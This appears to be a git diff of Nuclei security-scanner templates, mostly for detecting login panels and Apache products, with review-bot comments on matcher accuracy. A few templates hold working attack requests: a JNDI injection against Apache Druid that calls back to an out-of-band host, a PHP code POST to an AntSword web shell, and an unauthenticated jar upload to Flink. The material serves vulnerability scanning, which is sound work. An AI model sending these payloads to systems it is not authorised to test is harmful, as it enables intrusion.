@@ -3,16 +3,19 @@ id: amcrest-login info: name: Amcrest Login author: DhiyaneshDK - severity: info description: An Amcrest LDAP user login was discovered. + severity: info reference: - https://www.exploit-db.com/ghdb/7273 - classification: - cwe-id: CWE-200 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/nuclei-templates/Other/ametys-admin-login-300.yaml b/nuclei-templates/Other/ametys-admin-login-300.yaml deleted file mode 100644 index 7f33273288..0000000000 --- a/nuclei-templates/Other/ametys-admin-login-300.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login Panel - author: pathtaga - severity: info - description: An Ametys admin login panel was discovered. - classification: - cwe-id: CWE-200 - tags: panel,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ametys-admin-login.yaml b/nuclei-templates/Other/ametys-admin-login.yaml new file mode 100644 index 0000000000..7a96ee1ada --- /dev/null +++ b/nuclei-templates/Other/ametys-admin-login.yaml 
@@ -0,0 +1,39 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + tags: panel,ametys,cms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel-304.yaml b/nuclei-templates/Other/ampps-admin-panel-304.yaml deleted file mode 100644 index 1ced15ef7b..0000000000 --- a/nuclei-templates/Other/ampps-admin-panel-304.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ampps-admin-panel - -info: - name: AMPPS Admin Login Panel - author: deFr0ggy - severity: info - description: An AMPPS Admin login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps-admin/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'enduser/themes/default/js/universal.js' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel-305.yaml b/nuclei-templates/Other/ampps-admin-panel-305.yaml new file mode 100644 index 0000000000..cd7b7acd7d --- /dev/null +++ b/nuclei-templates/Other/ampps-admin-panel-305.yaml 
@@ -0,0 +1,43 @@ +id: ampps-admin-panel + +info: + name: AMPPS Admin Login Panel + author: deFr0ggy + severity: info + description: An AMPPS Admin login panel was detected. + tags: panel,ampps,login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps-admin/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'enduser/themes/default/js/universal.js' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-dirlisting-308.yaml b/nuclei-templates/Other/ampps-dirlisting-308.yaml new file mode 100644 index 0000000000..995d6fb8b5 --- /dev/null +++ b/nuclei-templates/Other/ampps-dirlisting-308.yaml @@ -0,0 +1,29 @@ +id: ampps-dirlisting + +info: + name: AMPPS by Softaculous - Directory Listing Enabled + author: deFr0ggy + severity: info + tags: panel,ampps,softaculous,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/client/" + - "{{BaseURL}}/files/" + - "{{BaseURL}}/icons/" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "[AMPPS] - Web Local" + - "Powered by AMPPS" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ampps-dirlisting.yaml b/nuclei-templates/Other/ampps-dirlisting.yaml deleted file mode 100644 index ad455130e5..0000000000 --- a/nuclei-templates/Other/ampps-dirlisting.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: ampps-dirlisting - -info: - name: AMPPS by Softaculous - Directory Listing - author: deFr0ggy - severity: info - tags: panel,ampps,softaculous,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}/client/" - - "{{BaseURL}}/files/" - - "{{BaseURL}}/icons/" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "[AMPPS] - Web Local" - - "Powered by AMPPS" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ampps-panel-310.yaml b/nuclei-templates/Other/ampps-panel-310.yaml new file mode 100644 index 0000000000..cb84438e15 --- /dev/null +++ b/nuclei-templates/Other/ampps-panel-310.yaml @@ -0,0 +1,43 @@ +id: ampps-panel + +info: + name: AMPPS Login Panel + author: deFr0ggy + severity: info + description: An AMPPS login panel was detected. + tags: panel,ampps,login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'themes/default/images/ampps/favicon.ico' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-panel.yaml b/nuclei-templates/Other/ampps-panel.yaml deleted file mode 100644 index 4a44ba9360..0000000000 --- a/nuclei-templates/Other/ampps-panel.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: ampps-panel - -info: - name: AMPPS Login Panel - author: deFr0ggy - severity: info - description: An AMPPS login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'themes/default/images/ampps/favicon.ico' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/AMSS-sqli.yaml b/nuclei-templates/Other/amss-sqli.yaml similarity index 100% rename from nuclei-templates/Other/AMSS-sqli.yaml rename to nuclei-templates/Other/amss-sqli.yaml diff --git a/nuclei-templates/Other/android-debug-database-exposed-315.yaml b/nuclei-templates/Other/android-debug-database-exposed-315.yaml deleted file mode 100644 index 669be2723a..0000000000 --- a/nuclei-templates/Other/android-debug-database-exposed-315.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: android-debug-database-exposed - -info: - name: Android Debug Manager - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 - tags: unauth,android - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Android Debug Database' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/android-debug-database-exposed.yaml b/nuclei-templates/Other/android-debug-database-exposed.yaml new file mode 100644 index 0000000000..94bf98c494 --- /dev/null +++ b/nuclei-templates/Other/android-debug-database-exposed.yaml 
@@ -0,0 +1,24 @@ +id: android-debug-database-exposed + +info: + name: Android Debug Manager + author: dhiyaneshDK + severity: low + reference: + - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 + tags: unauth,android + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Android Debug Database' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/anima-takeover-319.yaml b/nuclei-templates/Other/anima-takeover.yaml similarity index 100% rename from nuclei-templates/Other/anima-takeover-319.yaml rename to nuclei-templates/Other/anima-takeover.yaml diff --git a/nuclei-templates/Other/announcekit-takeover-324.yaml b/nuclei-templates/Other/announcekit-takeover-324.yaml index b0eaa68779..37a662aa98 100644 --- a/nuclei-templates/Other/announcekit-takeover-324.yaml +++ b/nuclei-templates/Other/announcekit-takeover-324.yaml @@ -1,25 +1,25 @@ -id: announcekit-takeover - -info: - name: Announcekit Takeover Detection - author: melbadry9 - severity: high - tags: takeover,announcekit - reference: - - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Error 404 - AnnounceKit' - - - type: status - status: - - 404 +id: announcekit-takeover + +info: + name: Announcekit Takeover Detection + author: melbadry9 + severity: high + tags: takeover,announcekit + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Error 404 - AnnounceKit' + + - type: status + status: + - 404 
diff --git a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml new file mode 100644 index 0000000000..3d5fb94471 --- /dev/null +++ b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml @@ -0,0 +1,34 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel Detect + author: Yuzhe-zhang-0 + description: An Ansible Semaphore login panel was detected. + severity: info + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + metadata: + shodan-query: http.html:"Semaphore" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,ansible,semaphore,cicd,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/login' + + matchers-condition: or + matchers: + - type: word + words: + - 'Ansible Semaphore' + + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/ansible-semaphore-panel.yaml b/nuclei-templates/Other/ansible-semaphore-panel.yaml deleted file mode 100644 index 0aa276d1d5..0000000000 --- a/nuclei-templates/Other/ansible-semaphore-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: ansible-semaphore-panel - -info: - name: Ansible Semaphore Panel - author: Yuzhe-zhang-0 - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 - tags: panel,ansible,semaphore,cicd - -requests: - - method: GET - redirects: true - max-redirects: 5 - path: - - '{{BaseURL}}/' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ansible Semaphore' - - '>Semaphore' - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure-331.yaml b/nuclei-templates/Other/ansible-tower-exposure-331.yaml deleted file mode 100644 index 72789c4755..0000000000 --- a/nuclei-templates/Other/ansible-tower-exposure-331.yaml +++ /dev/null 
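Review bot: The new ansible-semaphore-panel-327 template switches to `matchers-condition: or` and adds an unanchored regex `Semaphore` with no `part:` and no status matcher, so any page or error response whose body or headers merely contain the word Semaphore (documentation, a Java stack trace mentioning `java.util.concurrent.Semaphore`) is reported as a Semaphore login panel; the removed variant required `Ansible Semaphore` and `>Semaphore` together with status 200. Change it back to `matchers-condition: and`, scope both matchers with `part: body`, and restore a `type: status` matcher for `200`. The `shodan-query: http.html:"Semaphore"` in metadata is over-broad for the same reason; the `http.title:"Ansible Semaphore"` query from the removed file was the tighter one.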
@@ -1,19 +0,0 @@ -id: ansible-tower-exposure - -info: - name: Ansible Tower Exposure - author: pdteam - severity: low - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure.yaml b/nuclei-templates/Other/ansible-tower-exposure.yaml new file mode 100644 index 0000000000..66766fc246 --- /dev/null +++ b/nuclei-templates/Other/ansible-tower-exposure.yaml @@ -0,0 +1,37 @@ +id: ansible-tower-exposure + +info: + name: Ansible Tower Exposure + author: pdteam,idealphase + severity: low + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + classification: + cwe-id: CWE-200 + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Ansible Tower" + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/antsword-backdoor-334.yaml b/nuclei-templates/Other/antsword-backdoor-334.yaml deleted file mode 100644 index 27ea2ed01c..0000000000 --- a/nuclei-templates/Other/antsword-backdoor-334.yaml +++ /dev/null 
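Review bot: In the new ansible-tower-exposure.yaml the word matcher is loosened from `condition: and` (`Ansible Tower` plus `ansible-main-menu`) to `condition: or` with `ansible-bootstrap`, and there is still no `part: body` or status constraint, so a page that only mentions Ansible Tower in prose now produces a `low` finding. Keep `condition: and`, or at least add `part: body` and a status matcher, so the template still identifies the product rather than a string. The favicon extractor uses a greedy `(.+)` before `" \/>`; on single-line (minified) HTML that capture runs to the last `" />` in the line, so bound it with `([^"]+)` to return just the `v=` value.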
@@ -1,36 +0,0 @@ -id: antsword-backdoor - -info: - name: AntSword Backdoor Detection - author: ffffffff0x - severity: critical - description: An AntSword application backdoor shell was discovered. - reference: - - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - tags: backdoor,antsword - -requests: - - method: POST - path: - - "{{BaseURL}}/.antproxy.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: 'ant=echo md5("antproxy.php");' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "951d11e51392117311602d0c25435d7f" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/antsword-backdoor.yaml b/nuclei-templates/Other/antsword-backdoor.yaml new file mode 100644 index 0000000000..5cf33c9815 --- /dev/null +++ b/nuclei-templates/Other/antsword-backdoor.yaml 
@@ -0,0 +1,32 @@ +id: antsword-backdoor +info: + name: AntSword Backdoor Detection + author: ffffffff0x + severity: critical + description: An AntSword application backdoor shell was discovered. + reference: + - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-553 + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + tags: backdoor,antsword +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/apache-apisix-panel-338.yaml b/nuclei-templates/Other/apache-apisix-panel-337.yaml similarity index 100% rename from nuclei-templates/Other/apache-apisix-panel-338.yaml rename to nuclei-templates/Other/apache-apisix-panel-337.yaml diff --git a/nuclei-templates/Other/apache-axis-detect-341.yaml b/nuclei-templates/Other/apache-axis-detect-341.yaml deleted file mode 100644 index 6f4d1ee697..0000000000 --- a/nuclei-templates/Other/apache-axis-detect-341.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: apache-axis-detect - -info: - name: apache-axis-detect - author: dogasantos - severity: info - description: Axis and Axis2 detection - metadata: - verified: true - shodan-query: http.html:"Apache Axis" - tags: tech,axis2,middleware,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/axis2/" - - "{{BaseURL}}/axis/" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Validate" - - "Welcome" - - "Axis" - - "deployed" - - "installation" - - "Admin" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-axis-detect.yaml b/nuclei-templates/Other/apache-axis-detect.yaml new file mode 100644 index 0000000000..b5b574a7b5 --- /dev/null +++ b/nuclei-templates/Other/apache-axis-detect.yaml @@ -0,0 +1,32 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apache-cocoon-detect-342.yaml b/nuclei-templates/Other/apache-cocoon-detect-342.yaml new file mode 100644 index 0000000000..50a7346bfe --- /dev/null +++ b/nuclei-templates/Other/apache-cocoon-detect-342.yaml 
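Review bot: The replacement apache-axis-detect.yaml drops the `metadata:` block (`verified: true` and `shodan-query: http.html:"Apache Axis"`) that the removed -341 file carried, so the new copy is less documented than the one it supersedes. Restore that block under `info:` so the template stays discoverable via the Shodan query and keeps its verified marker. The six-word `and` matcher is unchanged and remains reasonably specific to the Axis welcome page.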
@@ -0,0 +1,26 @@ +id: apache-cocoon-detect +info: + name: Apache Cocoon detect + author: ffffffff0x + severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Cocoon" + fofa-query: app="APACHE-Cocoon" + tags: apache,cocoon,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - "X-Cocoon-Version" + extractors: + - type: regex + part: header + regex: + - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/nuclei-templates/Other/apache-cocoon-detect.yaml b/nuclei-templates/Other/apache-cocoon-detect.yaml deleted file mode 100644 index 1d3b85ddc5..0000000000 --- a/nuclei-templates/Other/apache-cocoon-detect.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: apache-cocoon-detect -info: - name: Apache Cocoon detect - author: ffffffff0x - severity: info - metadata: - fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "X-Cocoon-Version" - - extractors: - - type: regex - part: header - regex: - - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/nuclei-templates/Other/apache-config-344.yaml b/nuclei-templates/Other/apache-config.yaml similarity index 100% rename from nuclei-templates/Other/apache-config-344.yaml rename to nuclei-templates/Other/apache-config.yaml diff --git a/nuclei-templates/Other/apache-detect-347.yaml b/nuclei-templates/Other/apache-detect-347.yaml new file mode 100644 index 0000000000..2c300ba97f --- /dev/null +++ b/nuclei-templates/Other/apache-detect-347.yaml 
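Review bot: The header match in apache-cocoon-detect-342 is case-sensitive in both places (`X-Cocoon-Version` in the word matcher and `X\-Cocoon\-Version:` in the extractor), but header names are case-insensitive and are lowercased over HTTP/2 and by several reverse proxies, so `x-cocoon-version` responses are silently missed. Add `case-insensitive: true` to the word matcher and prefix the extractor regex with `(?i)`. The `([ 0-9.]+)` capture also includes the leading space in the extracted value; `\s*([0-9.]+)` gives a clean version string in the output.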
@@ -0,0 +1,31 @@ +id: apache-detect + +info: + name: Apache Detection + author: philippedelteil + severity: info + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server diff --git a/nuclei-templates/Other/apache-detect.yaml b/nuclei-templates/Other/apache-detect.yaml deleted file mode 100644 index eeb8966be3..0000000000 --- a/nuclei-templates/Other/apache-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server diff --git a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml new file mode 100644 index 0000000000..c250daba2a --- /dev/null +++ b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml 
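Review bot: The regex `Apache+` in apache-detect-347 applies the `+` only to the final `e` and is not tied to the `Server` header, so any header value containing `Apache` (an `X-Powered-By`, for instance) matches, while the `status: 200` requirement drops hosts that answer the root with 301/302/403 even though they send a `Server` header too. Use `(?mi)^Server:\s*Apache` and remove or widen the status matcher so the `kval` extractor still reports `Server` for redirecting hosts. The description could also note that many deployments set `ServerTokens Prod`, so a header without a version is not evidence of a patched build.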
@@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.89626 + epss-percentile: 0.98692 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + 
"pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-dubbo-detect-351.yaml b/nuclei-templates/Other/apache-dubbo-detect-351.yaml new file mode 100644 index 0000000000..596550af0c --- /dev/null +++ b/nuclei-templates/Other/apache-dubbo-detect-351.yaml @@ -0,0 +1,20 @@ +id: apache-dubbo-detect + +info: + name: Apache dubbo detect + author: ffffffff0x + severity: info + metadata: + fofa-query: app="APACHE-dubbo" + tags: apache,dubbo,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Basic realm=\"dubbo\"" diff --git a/nuclei-templates/Other/apache-dubbo-detect.yaml b/nuclei-templates/Other/apache-dubbo-detect.yaml deleted file mode 100644 index 7005b42a4c..0000000000 --- a/nuclei-templates/Other/apache-dubbo-detect.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: apache-dubbo-detect -info: - name: Apache dubbo detect - author: ffffffff0x - severity: info - metadata: - fofa-query: app="APACHE-dubbo" - tags: apache,dubbo,tech - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: header - words: - - "Basic realm=\"dubbo\"" 
diff --git a/nuclei-templates/Other/apache-filename-enum-354.yaml b/nuclei-templates/Other/apache-filename-enum-354.yaml deleted file mode 100644 index a37c4b75bf..0000000000 --- a/nuclei-templates/Other/apache-filename-enum-354.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: apache-filename-enum -info: - name: Apache Filename Enumeration - author: geeknik - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - severity: low - tags: apache,misconfig -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "

Apache Server at" - condition: and diff --git a/nuclei-templates/Other/apache-filename-enum.yaml b/nuclei-templates/Other/apache-filename-enum.yaml new file mode 100644 index 0000000000..5a6f43d2f1 --- /dev/null +++ b/nuclei-templates/Other/apache-filename-enum.yaml @@ -0,0 +1,30 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + severity: low + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + tags: apache,misconfig + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml new file mode 100644 index 0000000000..3c5d43fda3 --- /dev/null +++ b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml @@ -0,0 +1,43 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + 